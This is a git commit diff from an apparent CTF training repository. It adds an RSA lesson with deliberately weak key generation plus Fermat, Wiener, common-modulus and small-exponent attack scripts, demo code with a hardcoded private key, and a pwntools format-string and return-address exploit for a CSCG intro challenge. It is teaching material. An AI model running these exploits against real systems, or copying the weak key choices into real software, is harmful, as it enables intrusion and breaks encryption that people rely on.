rsa lesson added
This commit is contained in:
@@ -6,8 +6,10 @@ ret_sled = 0x9eb
|
|||||||
win_func_offset = 0x9ec
|
win_func_offset = 0x9ec
|
||||||
|
|
||||||
#with remote("b037e7ec4c1207e6b54007fb-1024-intro-pwn-1.challenge.cscg.live", 1337, ssl=True) as p:
|
#with remote("b037e7ec4c1207e6b54007fb-1024-intro-pwn-1.challenge.cscg.live", 1337, ssl=True) as p:
|
||||||
with remote("localhost", 1024, fam="ipv4") as p:
|
#with remote("localhost", 1024, fam="ipv4") as p:
|
||||||
|
with process("./pwn1") as p:
|
||||||
p.recvuntil(b":")
|
p.recvuntil(b":")
|
||||||
|
input("debugger")
|
||||||
p.sendline(b"%37$p")
|
p.sendline(b"%37$p")
|
||||||
data = p.recvuntil(b":")
|
data = p.recvuntil(b":")
|
||||||
memory_address_pattern = r"0x[0-9a-fA-F]+"
|
memory_address_pattern = r"0x[0-9a-fA-F]+"
|
||||||
@@ -25,5 +27,6 @@ with remote("localhost", 1024, fam="ipv4") as p:
|
|||||||
payload += p64((memory_address & 0xFFFFFFFFFFFFF000) | ret_sled)
|
payload += p64((memory_address & 0xFFFFFFFFFFFFF000) | ret_sled)
|
||||||
payload += p64(win_address)
|
payload += p64(win_address)
|
||||||
p.sendline(payload)
|
p.sendline(payload)
|
||||||
p.sendline(b"cat flag")
|
p.interactive()
|
||||||
log.info(p.clean())
|
#p.sendline(b"cat flag")
|
||||||
|
#log.info(p.clean())
|
||||||
|
|||||||
BIN
training/h4tum/Intro_to_RSA/Intro_to_RSA__PPT.pdf
Normal file
BIN
training/h4tum/Intro_to_RSA/Intro_to_RSA__PPT.pdf
Normal file
Binary file not shown.
BIN
training/h4tum/Intro_to_RSA/Intro_to_RSA__handout.pdf
Normal file
BIN
training/h4tum/Intro_to_RSA/Intro_to_RSA__handout.pdf
Normal file
Binary file not shown.
45
training/h4tum/Intro_to_RSA/challenge/Fermat/1.py
Normal file
45
training/h4tum/Intro_to_RSA/challenge/Fermat/1.py
Normal file
@@ -0,0 +1,45 @@
|
|||||||
|
from Crypto.Util.number import inverse, getPrime, bytes_to_long, long_to_bytes
|
||||||
|
from sympy import nextprime
|
||||||
|
import os
|
||||||
|
import math
|
||||||
|
|
||||||
|
|
||||||
|
flag = "h4tum{...}"
|
||||||
|
m = bytes_to_long(flag.encode())
|
||||||
|
|
||||||
|
p : int = getPrime(512)
|
||||||
|
diff = int.from_bytes(os.urandom(16), 'big')
|
||||||
|
q : int = nextprime(p - diff)
|
||||||
|
n = p * q
|
||||||
|
phi = (p - 1) * (q - 1)
|
||||||
|
e = 65537
|
||||||
|
d = inverse(e, phi)
|
||||||
|
|
||||||
|
ciphertext = pow(m, e, n)
|
||||||
|
|
||||||
|
print(f"Here is the public key:\nn = {n}\ne = {e}")
|
||||||
|
print(f"\nHere is the encrypted flag:\n{ciphertext}")
|
||||||
|
|
||||||
|
t = math.isqrt(n)
|
||||||
|
|
||||||
|
for i in range((n+1)//2 - t + 1):
|
||||||
|
val = (t + i)**2 - n
|
||||||
|
if val > 0:
|
||||||
|
root = math.isqrt(val)
|
||||||
|
if root * root == val:
|
||||||
|
r = math.isqrt((t+i)**2 - n)
|
||||||
|
rec_p = (t+i) - r
|
||||||
|
rec_q = (t+i) + r
|
||||||
|
rec_phi = (rec_p-1) * (rec_q-1)
|
||||||
|
rec_d = inverse(e, rec_phi)
|
||||||
|
plain_text = pow(ciphertext, rec_d, n)
|
||||||
|
print("We recovered d yay")
|
||||||
|
print(f"Cracked flag: {long_to_bytes(plain_text)}")
|
||||||
|
break
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Here is the public key:
|
||||||
|
# Here is the encrypted flag:
|
||||||
|
# 13158607848927768767396122915610010628021182023103983078656746030071489695567187651581550866461152226282740548654306454938594539749024910072164328096542525661951926739718955208177780816184581302682602611753650161772357698132248994074563798067850345731371433620586869504864647385937063506440611160969011596274
|
||||||
39
training/h4tum/Intro_to_RSA/challenge/Wiener/2.py
Normal file
39
training/h4tum/Intro_to_RSA/challenge/Wiener/2.py
Normal file
@@ -0,0 +1,39 @@
|
|||||||
|
from Crypto.Util.number import inverse, getPrime, bytes_to_long, long_to_bytes
|
||||||
|
from Crypto.PublicKey import RSA
|
||||||
|
from wiener_attack import wiener_attack
|
||||||
|
|
||||||
|
flag = "h4tum{...}"
|
||||||
|
m = bytes_to_long(flag.encode())
|
||||||
|
|
||||||
|
p = getPrime(512)
|
||||||
|
q = getPrime(512)
|
||||||
|
n = p * q
|
||||||
|
phi = (p - 1) * (q - 1)
|
||||||
|
d = getPrime(30)
|
||||||
|
e = inverse(d, phi)
|
||||||
|
|
||||||
|
ciphertext = pow(m, e, n)
|
||||||
|
|
||||||
|
pubkey = RSA.construct((n, e))
|
||||||
|
pub_pem = pubkey.export_key(format="PEM")
|
||||||
|
|
||||||
|
print(pub_pem.decode())
|
||||||
|
print(f"\nHere is the encrypted flag:\n{ciphertext}")
|
||||||
|
|
||||||
|
rec_d = wiener_attack(e, n)
|
||||||
|
|
||||||
|
print(long_to_bytes(pow(ciphertext, d, n)))
|
||||||
|
|
||||||
|
# -----BEGIN PUBLIC KEY-----
|
||||||
|
# MIIBHjANBgkqhkiG9w0BAQEFAAOCAQsAMIIBBgKBgGUboAvXiM8ETI/20wMIDKp4
|
||||||
|
# Yvh0bh90Rv5ixgn0cwUru18hYZdHMmbVRbbzImcJUl+TiGO6ED71fZARh55vpA+p
|
||||||
|
# IVwrXsFUnUzpF+5Xt04qo6ums1nSd3Kqx/A1gBerMCk8sO8PPJwKW/SgUu8SpOMn
|
||||||
|
# XtNB3UCiF5iklNzpRJ9BAoGAWMfZ0dEudQf+xEwd4jq066R781PuIQ+FwsEpDAtC
|
||||||
|
# oFuPpJgo2JEhw6QHdPbSBSAZiJTeKUBrh34s1Y1ALNQy2HgpDF+UGvfndeqxI+tx
|
||||||
|
# ZnhnmOKyFWLRS7CElp0YunzaWSjM9B4UeyDqnO70f0wopGhSrHx326ourFJBKDak
|
||||||
|
# g0k=
|
||||||
|
# -----END PUBLIC KEY-----
|
||||||
|
|
||||||
|
# Here is the encrypted flag:
|
||||||
|
# 33875780076252799475072801857719625760580293404621927950834466845200175353837317794093362254089677034810036784377827562641344104659319423578279557002930036256051311423722214046538552333691207322585750166331224527229737296960110973126147103391345215399552776397918690683992071757399724992352071896156421861125
|
||||||
|
|
||||||
@@ -0,0 +1,71 @@
|
|||||||
|
import math
|
||||||
|
|
||||||
|
def continued_fraction(numerator, denominator):
|
||||||
|
"""Generate the continued fraction expansion of numerator/denominator."""
|
||||||
|
cf = []
|
||||||
|
while denominator:
|
||||||
|
a = numerator // denominator
|
||||||
|
cf.append(a)
|
||||||
|
numerator, denominator = denominator, numerator - a * denominator
|
||||||
|
return cf
|
||||||
|
|
||||||
|
|
||||||
|
def convergents_from_cf(cf):
|
||||||
|
"""Generate convergents (k, d) from a continued fraction sequence cf."""
|
||||||
|
n0, d0 = cf[0], 1
|
||||||
|
yield (n0, 1)
|
||||||
|
if len(cf) == 1:
|
||||||
|
return
|
||||||
|
n1 = cf[1] * cf[0] + 1
|
||||||
|
d1 = cf[1]
|
||||||
|
yield (n1, d1)
|
||||||
|
for i in range(2, len(cf)):
|
||||||
|
ni = cf[i] * n1 + n0
|
||||||
|
di = cf[i] * d1 + d0
|
||||||
|
yield (ni, di)
|
||||||
|
n0, d0, n1, d1 = n1, d1, ni, di
|
||||||
|
|
||||||
|
|
||||||
|
def is_perfect_square(x):
|
||||||
|
"""Check whether x is a perfect square."""
|
||||||
|
if x < 0:
|
||||||
|
return False
|
||||||
|
s = math.isqrt(x)
|
||||||
|
return s * s == x
|
||||||
|
|
||||||
|
|
||||||
|
def wiener_attack(e, n):
|
||||||
|
"""
|
||||||
|
Attempt to recover the RSA private exponent d using Wiener's attack.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
e: Public exponent
|
||||||
|
n: Modulus
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
If successful, returns the private exponent d; otherwise returns None.
|
||||||
|
"""
|
||||||
|
cf = continued_fraction(e, n)
|
||||||
|
for k, d in convergents_from_cf(cf):
|
||||||
|
if k == 0:
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Check whether (e*d - 1) is divisible by k to derive phi
|
||||||
|
if (e * d - 1) % k != 0:
|
||||||
|
continue
|
||||||
|
phi = (e * d - 1) // k
|
||||||
|
|
||||||
|
# Discriminant of x^2 - (n - phi + 1)x + n = 0
|
||||||
|
s = n - phi + 1
|
||||||
|
discr = s * s - 4 * n
|
||||||
|
|
||||||
|
if discr >= 0 and is_perfect_square(discr):
|
||||||
|
t = math.isqrt(discr)
|
||||||
|
|
||||||
|
# Recover p and q
|
||||||
|
p = (s + t) // 2
|
||||||
|
q = (s - t) // 2
|
||||||
|
if p * q == n:
|
||||||
|
return d
|
||||||
|
|
||||||
|
return None
|
||||||
50
training/h4tum/Intro_to_RSA/challenge/modular/3.py
Normal file
50
training/h4tum/Intro_to_RSA/challenge/modular/3.py
Normal file
@@ -0,0 +1,50 @@
|
|||||||
|
from Crypto.Util.number import getPrime, bytes_to_long, long_to_bytes
|
||||||
|
from sympy import gcdex
|
||||||
|
from math import gcd
|
||||||
|
|
||||||
|
|
||||||
|
flag = "h4tum{...}"
|
||||||
|
m = bytes_to_long(flag.encode())
|
||||||
|
|
||||||
|
e1, e2 = 65537, 17
|
||||||
|
assert gcd(e1, e2) == 1
|
||||||
|
|
||||||
|
while True:
|
||||||
|
p = getPrime(512)
|
||||||
|
q = getPrime(512)
|
||||||
|
n = p * q
|
||||||
|
phi = (p - 1) * (q - 1)
|
||||||
|
|
||||||
|
if gcd(e1, phi) != 1 or gcd(e2, phi) != 1:
|
||||||
|
continue
|
||||||
|
if m >= n:
|
||||||
|
continue
|
||||||
|
if gcd(m, n) != 1:
|
||||||
|
continue
|
||||||
|
break
|
||||||
|
|
||||||
|
c1 = pow(m, e1, n)
|
||||||
|
c2 = pow(m, e2, n)
|
||||||
|
|
||||||
|
|
||||||
|
print(f"n = {n}")
|
||||||
|
print(f"e1 = {e1}")
|
||||||
|
print(f"e2 = {e2}")
|
||||||
|
print(f"c1 = {c1}")
|
||||||
|
print(f"c2 = {c2}")
|
||||||
|
|
||||||
|
x, y, g = gcdex(e1, e2)
|
||||||
|
|
||||||
|
x = int(x)
|
||||||
|
y = int(y)
|
||||||
|
|
||||||
|
print(f"x {x} | y {y}")
|
||||||
|
|
||||||
|
if g == 1:
|
||||||
|
print(long_to_bytes(pow((pow(c1, x, n) * pow(c2, y, n)), 1, n)))
|
||||||
|
|
||||||
|
# n = 65707100137186888475953513086898008905139437630875837854644107822814283110769943579567177881705884274398390781130006134316686487768614537736768547066999613093550734163327713557603091143994827233687646229561643622445920391793762897858845575115299394349389922615093939357420040773283610664101678989419396092347
|
||||||
|
# e1 = 65537
|
||||||
|
# e2 = 17
|
||||||
|
# c1 = 7884926352513340573382039144424214727926794782607805142710494009270484466220925417591780881028724970568583944980873161206083606075384860708927042438650854760874336954047477893939539790216193654418650762594184302293754065850164791109812773425623526938062911997730089936569977360813014753477745012650386772981
|
||||||
|
# c2 = 11375974342330610521528067622440162683299269265928514681623828493060125481649837931599740517662407981391104665035998955029942650948493441810229768425798821925645814933013176879334289941104021860757801270190361115580835274215465891021181470368445998384179348332817603554056032081626905073456569537572535147729
|
||||||
25
training/h4tum/Intro_to_RSA/challenge/small e/4.py
Normal file
25
training/h4tum/Intro_to_RSA/challenge/small e/4.py
Normal file
@@ -0,0 +1,25 @@
|
|||||||
|
from Crypto.Util.number import inverse, getPrime, bytes_to_long
|
||||||
|
|
||||||
|
|
||||||
|
flag = "h4tum{...}"
|
||||||
|
m = bytes_to_long(flag.encode())
|
||||||
|
|
||||||
|
p = getPrime(512)
|
||||||
|
q = getPrime(512)
|
||||||
|
n = p * q
|
||||||
|
phi = (p - 1) * (q - 1)
|
||||||
|
e = 3
|
||||||
|
d = inverse(e, phi)
|
||||||
|
|
||||||
|
|
||||||
|
ciphertext = pow(m, e, n)
|
||||||
|
|
||||||
|
print(f"Here is the public key:\nn = {n}\ne = {e}")
|
||||||
|
print(f"\nHere is the encrypted flag:\n{ciphertext}")
|
||||||
|
|
||||||
|
# Here is the public key:
|
||||||
|
# n = 133754776379084890949396128184054209827880534649872344546551916044637014117738848312911601805615413451730371613447269527792021869628568786604565343522407135622719358245312844577182399504053254247235363664243271537669953064325407487226101646170736997104441396305543325547272540155515055362880210828933349672043
|
||||||
|
# e = 3
|
||||||
|
|
||||||
|
# Here is the encrypted flag:
|
||||||
|
# 27485520006079233807623807132370137913974673072796110190145166712012781629787795173249446320555776530359265337337323534643030075414274984551090326260078977798035707372748401792308537889036666723735654189543943146031289186076736572201980302715998036022634187371997765033713933871352433152430973165071957865672
|
||||||
36
training/h4tum/Intro_to_RSA/demo/PEM/dec_private.py
Normal file
36
training/h4tum/Intro_to_RSA/demo/PEM/dec_private.py
Normal file
@@ -0,0 +1,36 @@
|
|||||||
|
from cryptography.hazmat.primitives import serialization
|
||||||
|
|
||||||
|
pem_data = b"""
|
||||||
|
-----BEGIN PRIVATE KEY-----
|
||||||
|
MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAK4gNXUU314X3Wp8
|
||||||
|
ORTyJDw/WqrShnmk2SKuJHocNc9NXWbSZB/UQpjjt5yjmB5Ugl7OkfQd+53TsmJy
|
||||||
|
Vr2ZYjpqNAtu5ijJiBQ3cVTeKEGzPHeCHWLedfStUbC77/+kNAsGPQOzkoHmXe95
|
||||||
|
UnopxzVOfjSdR6vab6YXNvpj1DdvAgMBAAECgYAfT8ltIXC9UdtOD8KQAq8Dan0a
|
||||||
|
ZLsr2rn1I42Jq9L9UTMvjzvUAW5sYd6du0laguXiuJDEbjPWAMB+NYNlmtRv0rzt
|
||||||
|
Ych1EHF/hgCZUMHxISYrrvY1PoHu4JZmTGpo5cREdnjfqzyEDvXO+Rg2AA7rk7hW
|
||||||
|
qg8cmisvaujZ+vtReQJBANkPhl4ItI8uMGqOB7Lev5pMNmZPOkqcYFl7Vi9OYr5s
|
||||||
|
wsTKyvaGM8i2NonSAgwszLl6ylHEBy5CkCopq9gbN4sCQQDNXOirgt/X75ScYPso
|
||||||
|
pzMtcCN0WUPeAbxqfOcerZ5e8XDROGSotjZc3uCaXgPk7kmBRPcoLTHoBruO5pPz
|
||||||
|
8NwtAkEAlVzagFCLNs9434nWgF5JCHsTH/m6yearYke9uZW92v1qVRKa8WLNtXq1
|
||||||
|
MsdBQ3F8etGk8PjsXAfPvkOojW/FGwJBALFiLxb2VKMQLi1lF4xl366/zeARuq1o
|
||||||
|
knborDmzfbhElE4jh86ylQJjAV5VFsgHizY9e78YSqNALYGhaOqsgYECQQDDavQE
|
||||||
|
Z47hwsvkDXSfmOYbLCqPUVKJ4Kk/OO+m8yCugQImDYxgIylroZe3wpKFH5Yk2NkB
|
||||||
|
G6buDKcaTFHcOJiy
|
||||||
|
-----END PRIVATE KEY-----
|
||||||
|
"""
|
||||||
|
|
||||||
|
private_key = serialization.load_pem_private_key(
|
||||||
|
pem_data,
|
||||||
|
password=None
|
||||||
|
)
|
||||||
|
|
||||||
|
numbers = private_key.private_numbers()
|
||||||
|
|
||||||
|
print(f"Modulus (n): {numbers.public_numbers.n}")
|
||||||
|
print(f"Public Exponent (e): {numbers.public_numbers.e}")
|
||||||
|
print(f"Private Exponent (d): {numbers.d}")
|
||||||
|
print(f"Prime 1 (p): {numbers.p}")
|
||||||
|
print(f"Prime 2 (q): {numbers.q}")
|
||||||
|
print(f"d mod (p-1): {numbers.dmp1}")
|
||||||
|
print(f"d mod (q-1): {numbers.dmq1}")
|
||||||
|
print(f"q^-1 mod p: {numbers.iqmp}")
|
||||||
16
training/h4tum/Intro_to_RSA/demo/PEM/dec_pub.py
Normal file
16
training/h4tum/Intro_to_RSA/demo/PEM/dec_pub.py
Normal file
@@ -0,0 +1,16 @@
|
|||||||
|
from cryptography.hazmat.primitives import serialization
|
||||||
|
|
||||||
|
pem_data = b"""
|
||||||
|
-----BEGIN PUBLIC KEY-----
|
||||||
|
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCuIDV1FN9eF91qfDkU8iQ8P1qq
|
||||||
|
0oZ5pNkiriR6HDXPTV1m0mQf1EKY47eco5geVIJezpH0Hfud07Jicla9mWI6ajQL
|
||||||
|
buYoyYgUN3FU3ihBszx3gh1i3nX0rVGwu+//pDQLBj0Ds5KB5l3veVJ6Kcc1Tn40
|
||||||
|
nUer2m+mFzb6Y9Q3bwIDAQAB
|
||||||
|
-----END PUBLIC KEY-----
|
||||||
|
"""
|
||||||
|
|
||||||
|
key = serialization.load_pem_public_key(pem_data)
|
||||||
|
|
||||||
|
numbers = key.public_numbers()
|
||||||
|
print(f"Modulus (n): {numbers.n}")
|
||||||
|
print(f"Exponent (e): {numbers.e}")
|
||||||
15
training/h4tum/Intro_to_RSA/demo/PEM/easy_gen.py
Normal file
15
training/h4tum/Intro_to_RSA/demo/PEM/easy_gen.py
Normal file
@@ -0,0 +1,15 @@
|
|||||||
|
from cryptography.hazmat.primitives.asymmetric import rsa
|
||||||
|
from cryptography.hazmat.primitives import serialization
|
||||||
|
|
||||||
|
key = rsa.generate_private_key(public_exponent=65537, key_size=1024)
|
||||||
|
|
||||||
|
print(key.private_bytes(
|
||||||
|
serialization.Encoding.PEM,
|
||||||
|
serialization.PrivateFormat.PKCS8,
|
||||||
|
serialization.NoEncryption()
|
||||||
|
).decode())
|
||||||
|
|
||||||
|
print(key.public_key().public_bytes(
|
||||||
|
serialization.Encoding.PEM,
|
||||||
|
serialization.PublicFormat.SubjectPublicKeyInfo
|
||||||
|
).decode())
|
||||||
37
training/h4tum/Intro_to_RSA/demo/PEM/gen.py
Normal file
37
training/h4tum/Intro_to_RSA/demo/PEM/gen.py
Normal file
@@ -0,0 +1,37 @@
|
|||||||
|
from cryptography.hazmat.primitives.asymmetric import rsa
|
||||||
|
from cryptography.hazmat.primitives import serialization
|
||||||
|
from Crypto.Util.number import getPrime
|
||||||
|
|
||||||
|
e = 65537
|
||||||
|
p = getPrime(512)
|
||||||
|
q = getPrime(512)
|
||||||
|
n = p * q
|
||||||
|
phi = (p - 1) * (q - 1)
|
||||||
|
d = pow(e, -1, phi)
|
||||||
|
|
||||||
|
dp = d % (p - 1)
|
||||||
|
dq = d % (q - 1)
|
||||||
|
q_inv = pow(q, -1, p)
|
||||||
|
|
||||||
|
private_numbers = rsa.RSAPrivateNumbers(
|
||||||
|
p=p,
|
||||||
|
q=q,
|
||||||
|
d=d,
|
||||||
|
dmp1=dp,
|
||||||
|
dmq1=dq,
|
||||||
|
iqmp=q_inv,
|
||||||
|
public_numbers=rsa.RSAPublicNumbers(e=e, n=n)
|
||||||
|
)
|
||||||
|
|
||||||
|
key = private_numbers.private_key()
|
||||||
|
|
||||||
|
print(key.private_bytes(
|
||||||
|
encoding=serialization.Encoding.PEM,
|
||||||
|
format=serialization.PrivateFormat.PKCS8,
|
||||||
|
encryption_algorithm=serialization.NoEncryption()
|
||||||
|
).decode())
|
||||||
|
|
||||||
|
print(key.public_key().public_bytes(
|
||||||
|
serialization.Encoding.PEM,
|
||||||
|
serialization.PublicFormat.SubjectPublicKeyInfo
|
||||||
|
).decode())
|
||||||
50
training/h4tum/Intro_to_RSA/demo/rsa_crt_demo.py
Normal file
50
training/h4tum/Intro_to_RSA/demo/rsa_crt_demo.py
Normal file
@@ -0,0 +1,50 @@
|
|||||||
|
from Crypto.Util.number import getPrime, bytes_to_long, long_to_bytes
|
||||||
|
from math import gcd
|
||||||
|
from sympy.ntheory.modular import crt
|
||||||
|
import time
|
||||||
|
|
||||||
|
# key generation
|
||||||
|
p = getPrime(512) # 512-bit prime number
|
||||||
|
q = getPrime(512) # 512-bit prime number
|
||||||
|
n = p * q
|
||||||
|
phi = (p - 1) * (q - 1)
|
||||||
|
e = 65537 # = 2^16 +1 = 10000000000000001
|
||||||
|
assert gcd(e, phi) == 1
|
||||||
|
|
||||||
|
d = pow(e, -1, phi)
|
||||||
|
|
||||||
|
# encryption
|
||||||
|
def encrypt(message):
|
||||||
|
m = bytes_to_long(message.encode())
|
||||||
|
c = pow(m, e, n)
|
||||||
|
return c
|
||||||
|
|
||||||
|
# CRT
|
||||||
|
dp = d % (p - 1) # d_p = d mod (p-1)
|
||||||
|
dq = d % (q - 1) # d_q = d mod (q-1)
|
||||||
|
q_inv = pow(q, -1, p) # q^{-1} mod p
|
||||||
|
|
||||||
|
def decrypt(cipher_int):
|
||||||
|
m1 = pow(cipher_int, dp, p) # c^dp mod p
|
||||||
|
m2 = pow(cipher_int, dq, q) # c^dq mod q
|
||||||
|
|
||||||
|
m, mod = crt([p, q], [m1, m2]) # m ≡ m1 (mod p), m ≡ m2 (mod q)
|
||||||
|
|
||||||
|
# Garner's Algorithm
|
||||||
|
# h = (m1 - m2) * q_inv % p
|
||||||
|
# m = (m2 + h * q) % n
|
||||||
|
|
||||||
|
message = long_to_bytes(m).decode()
|
||||||
|
return message
|
||||||
|
|
||||||
|
m = "Hello World"
|
||||||
|
c = encrypt(m)
|
||||||
|
|
||||||
|
start = time.perf_counter()
|
||||||
|
m_recover = decrypt(c)
|
||||||
|
end = time.perf_counter()
|
||||||
|
|
||||||
|
print("Ciphertext: ", c)
|
||||||
|
|
||||||
|
print("Message: ", m_recover)
|
||||||
|
print(f"decrypt time: {(end-start)*1e3:.3f} ms")
|
||||||
37
training/h4tum/Intro_to_RSA/demo/rsa_demo.py
Normal file
37
training/h4tum/Intro_to_RSA/demo/rsa_demo.py
Normal file
@@ -0,0 +1,37 @@
|
|||||||
|
from Crypto.Util.number import getPrime, bytes_to_long, long_to_bytes
|
||||||
|
from math import gcd
|
||||||
|
import time
|
||||||
|
|
||||||
|
# key generation
|
||||||
|
p = getPrime(512) # 512-bit prime number
|
||||||
|
q = getPrime(512) # 512-bit prime number
|
||||||
|
n = p * q
|
||||||
|
phi = (p - 1) * (q - 1)
|
||||||
|
e = 65537 # = 2^16 +1 = 10000000000000001
|
||||||
|
assert gcd(e, phi) == 1
|
||||||
|
|
||||||
|
d = pow(e, -1, phi)
|
||||||
|
|
||||||
|
# encryption
|
||||||
|
def encrypt(message):
|
||||||
|
m = bytes_to_long(message.encode())
|
||||||
|
c = pow(m, e, n)
|
||||||
|
return c
|
||||||
|
|
||||||
|
# decryption
|
||||||
|
def decrypt(cipher_int):
|
||||||
|
m = pow(cipher_int, d, n)
|
||||||
|
message = long_to_bytes(m).decode()
|
||||||
|
return message
|
||||||
|
|
||||||
|
m = "Hello World"
|
||||||
|
c = encrypt(m)
|
||||||
|
|
||||||
|
start = time.perf_counter()
|
||||||
|
m_recover = decrypt(c)
|
||||||
|
end = time.perf_counter()
|
||||||
|
|
||||||
|
print("Ciphertext: ", c)
|
||||||
|
|
||||||
|
print("Message: ", m_recover)
|
||||||
|
print(f"decrypt time: {(end-start)*1e3:.3f} ms")
|
||||||
0
training/h4tum/binex_training/cscg_2024_intro_pwn/pwn1
Normal file → Executable file
0
training/h4tum/binex_training/cscg_2024_intro_pwn/pwn1
Normal file → Executable file
@@ -3,5 +3,5 @@ from pwn import *
|
|||||||
with process('./intro-pwn') as p:
|
with process('./intro-pwn') as p:
|
||||||
print(p.recvuntil(b"?"))
|
print(p.recvuntil(b"?"))
|
||||||
input("open gdb")
|
input("open gdb")
|
||||||
print(p.sendline(b"A"*16+b"B"*8+b"C"*8))
|
print(p.sendline(b"A"*16+b"B"*8))
|
||||||
p.interactive()
|
p.interactive()
|
||||||
|
|||||||
Reference in New Issue
Block a user